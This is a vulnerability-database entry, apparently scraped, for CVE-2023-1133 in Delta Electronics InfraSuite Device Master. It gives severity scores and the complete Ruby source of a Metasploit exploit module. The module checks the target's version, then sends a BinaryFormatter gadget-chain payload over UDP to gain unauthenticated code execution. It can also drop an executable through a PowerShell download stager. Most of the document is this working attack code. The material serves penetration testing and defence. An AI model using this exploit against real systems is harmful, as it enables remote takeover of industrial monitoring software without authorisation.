Lucene search

Anonymous, Shelby PaceMSF:EXPLOIT-WINDOWS-MISC-DELTA_ELECTRONICS_INFRASUITE_DESERIALIZATION-

HistoryJun 01, 2023 - 10:57 p.m.

Delta Electronics InfraSuite Device Master Deserialization

2023-06-0122:57:57

Anonymous, Shelby Pace

www.rapid7.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.108 Low

EPSS

Percentile

95.1%

JSON

Delta Electronics InfraSuite Device Master versions below v1.0.5 have an unauthenticated .NET deserialization vulnerability within the ‘ParseUDPPacket()’ method of the ‘Device-Gateway-Status’ process. The ‘ParseUDPPacket()’ method reads user-controlled packet data and eventually calls ‘BinaryFormatter.Deserialize()’ on what it determines to be the packet header without appropriate validation, leading to unauthenticated code execution as the user running the ‘Device-Gateway-Status’ process.

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Udp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
        'Description' => %q{
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
          method of the 'Device-Gateway-Status' process.

          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
        },
        'Author' => [
          'Anonymous', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-1133'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
        ],
        'Platform' => 'win',
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'CmdStagerFlavor' => :psh_invokewebrequest
            }
          ],
          [
            'Windows CMD',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :windows_cmd
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(10100),
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
    ])
  end

  def check
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'login.html')
    )

    return CheckCode::Unknown unless res

    unless res.body.include?('InfraSuite Manager Login')
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
    end

    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
    )

    unless res&.body&.include?('var devicemasterCfg')
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
    end

    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
    unless version && version.length > 1
      return CheckCode::Detected('Failed to find version string')
    end

    version = version[1]
    vprint_status("Found version '#{version}' of InfraSuite Device Master")
    r_vers = Rex::Version.new(version)

    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

    CheckCode::Safe
  end

  def exploit
    connect_udp
    case target['Type']
    when :windows_dropper
      execute_cmdstager
    when :windows_cmd
      execute_command(payload.encoded)
    end
  end

  def execute_command(cmd, _opts = {})
    serialized = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :ClaimsPrincipal,
      formatter: :BinaryFormatter
    )

    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
    udp_sock.put(pkt)
  end

  def cleanup
    disconnect_udp
  end
end